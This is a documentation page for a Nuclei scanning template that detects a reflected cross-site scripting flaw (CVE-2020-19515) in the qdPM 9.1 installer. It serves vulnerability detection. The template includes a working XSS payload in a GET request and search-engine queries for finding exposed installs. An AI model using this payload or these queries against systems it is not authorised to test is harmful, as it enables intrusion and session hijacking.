qdPM 9.1 - Cross-site Scripting
ID: CVE-2020-19515
Severity: medium
Author: theamanrawat
Tags: cve2020,cve,xss,qdpm,unauth
Description
Section titled “Description”qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php.
YAML Source
Section titled “YAML Source”id: CVE-2020-19515
info: name: qdPM 9.1 - Cross-site Scripting author: theamanrawat severity: medium description: | qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.43259 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 fofa-query: icon_hash=762074255 tags: cve2020,cve,xss,qdpm,unauth
http: - method: GET path: - "{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"
matchers-condition: and matchers: - type: word part: body words: - '<img src=x onerror=alert(document.domain) />' - 'qdPM' condition: and
- type: word part: header words: - 'text/html'
- type: status status: - 200# digest: 4a0a00473045022100a1156e32c2d65b96272690c5b58137c2cd52a440c105ca7e14ee5d8bd8b94fb00220759f74f22ee9ffe421571aa5b7b963e0d0f137cf8e6d8942867819d78efe029c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-19515.yaml"